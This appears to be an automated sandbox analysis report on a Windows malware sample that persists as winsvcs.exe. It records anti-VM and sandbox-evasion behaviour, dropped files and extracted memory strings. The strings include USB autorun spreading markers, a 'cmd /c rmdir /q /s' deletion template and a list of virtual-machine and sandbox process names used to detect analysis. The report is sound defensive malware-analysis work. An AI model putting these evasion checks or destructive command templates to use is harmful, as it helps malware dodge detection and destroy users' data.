        Source: C:\Windows\94000696690303050\winsvcs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_6-13088
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,Sleepgraph_0-13158
        Source: C:\Windows\94000696690303050\winsvcs.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,Sleepgraph_6-13149
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.0000000000759000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLH
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCO
        Source: winsvcs.exe, 00000009.00000002.2607599559.0000000000678000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL{J
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCONNSVC.EXEVMTOOLSD.EXEVMWAREUSER.EXESBIEDLL.DLLSBIEDLLX.DLLDIR_WATCH.DLLWPESPY.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMET.U
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NNSVC.EXEVMTOOLSD.EXEVMWAREUSER.EXESBIEDLL.DLLSBIEDLLX.DLLDIR_WATCH.DLLWPESPY.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMET.U
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: USEAUTOPLAY=1.LNK.VBS.BAT.JS.SCR.COM.JSE.CMD.PIF.JAR.DLL%LS\%S.LNKAUTORUN.INF_%LS\%S%S\_\%LS.../C RMDIR /Q /S "%LS"CMD.EXE/C MOVE /Y "%LS", "%LS"CMD.EXERB%HS%TEMP%%LS\%D%D.EXEMOZILLA/5.0 (MACINTOSH; INTEL MAC OS X 10.9; RV:25.0) GECKO/20100101 FIREFOX/25.0%LS:ZONE.IDENTIFIER%LS\%D%D.EXE%LS:ZONE.IDENTIFIERPYTHON.EXEPYTHONW.EXEPRL_CC.EXEPRL_TOOLS.EXEVMSRVC.EXEVMUSRVC.EXEXENSERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXEVBOXCONTROL.EXEVMWARESERVICE.EXEVMWARETRAY.EXETPAUTOCO44
        Source: C:\Windows\94000696690303050\winsvcs.exeWindow / User API: threadDelayed 9065Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvaded block: after key decisiongraph_0-13015
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1054
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-13043
        Source: C:\Windows\94000696690303050\winsvcs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-13043
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-13567
        Source: C:\Windows\94000696690303050\winsvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-13089
        Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328Thread sleep count: 178 > 30Jump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328Thread sleep time: -178000s >= -30000sJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3460Thread sleep count: 31 > 30Jump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328Thread sleep count: 9065 > 30Jump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exe TID: 3328Thread sleep time: -9065000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_00611718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00611754h1_2_00611718
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 006E1754h10_2_006E1718
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_00181718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00181754h15_2_00181718
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,0_2_00402204
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,0_2_004032A4
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006129E2
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_004032A4 memset,memset,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFullPathNameW,CharLowerW,Sleep,Sleep,Sleep,Sleep,PathFindFileNameW,SetFileAttributesW,DeleteFileW,Sleep,CopyFileW,Sleep,Sleep,FindNextFileW,FindClose,6_2_004032A4
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00402204 GetTickCount,srand,memset,memset,memset,memset,memset,memset,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,_snwprintf,Sleep,_wfopen,fseek,ftell,fclose,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,Sleep,SetFileAttributesW,Sleep,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,Sleep,PathFileExistsW,CopyFileW,SetFileAttributesW,Sleep,PathFileExistsW,_wfopen,fprintf,fclose,SetFileAttributesW,Sleep,FindFirstFileW,memset,_snwprintf,SetFileAttributesW,DeleteFileW,Sleep,PathFileExistsW,memset,memset,_snwprintf,FindCloseChangeNotification,_snwprintf,SetFileAttributesW,PathFileExistsW,PathFileExistsW,GetFileAttributesW,memset,_snwprintf,ShellExecuteW,DeleteFileW,memset,_snwprintf,ShellExecuteW,FindNextFileW,FindClose,6_2_00402204
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,10_2_006E29E2
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_001829E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,15_2_001829E2
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00402C41 memset,GetModuleFileNameW,Sleep,_wfopen,fseek,ftell,fclose,Sleep,memset,memset,GetLogicalDriveStringsW,GetDriveTypeW,SetErrorMode,GetVolumeInformationW,GetDriveTypeW,Sleep,0_2_00402C41
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00425CCD VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,0_2_00425CCD
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
        Source: Amcache.hve.1.drBinary or memory string: VMware
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco44
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoco
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vmwaretray.exe
        Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
        Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vmtoolsd.exe
        Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.1.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
        Source: XBVdJN.exe, 00000001.00000003.2333200622.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000003.2333120316.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000003.2333172802.00000000011FF000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: XBVdJN.exe, 0000000F.00000002.2796033274.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: UseAutoPlay=1.lnk.vbs.bat.js.scr.com.jse.cmd.pif.jar.dll%ls\%s.lnkautorun.inf_%ls\%s%s\_\%ls.../c rmdir /q /s "%ls"cmd.exe/c move /y "%ls", "%ls"cmd.exerb%hs%temp%%ls\%d%d.exeMozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0%ls:Zone.Identifier%ls\%d%d.exe%ls:Zone.Identifierpython.exepythonw.exeprl_cc.exeprl_tools.exevmsrvc.exevmusrvc.exexenservice.exevboxservice.exevboxtray.exevboxcontrol.exevmwareservice.exevmwaretray.exetpautoconnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: XBVdJN.exe, 0000000F.00000002.2796033274.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<C
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vmwareuser.exe
        Source: Amcache.hve.1.drBinary or memory string: vmci.sys
        Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.1.drBinary or memory string: VMware20,1
        Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nnsvc.exevmtoolsd.exevmwareuser.exesbiedll.dllsbiedllx.dlldir_watch.dllwpespy.dllkernel32.dllwine_get_unix_file_namet.u
        Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vmsrvc.exe
        Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vboxservice.exe
        Source: winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: vmwareservice.exe
        Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeAPI call chain: ExitProcess graph end nodegraph_0-13008
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeAPI call chain: ExitProcess graph end nodegraph_1-1029
        Source: C:\Windows\94000696690303050\winsvcs.exeAPI call chain: ExitProcess graph end nodegraph_6-13106
        Source: C:\Windows\94000696690303050\winsvcs.exeAPI call chain: ExitProcess graph end nodegraph_6-13092
        Source: C:\Windows\94000696690303050\winsvcs.exeAPI call chain: ExitProcess graph end nodegraph_6-13093
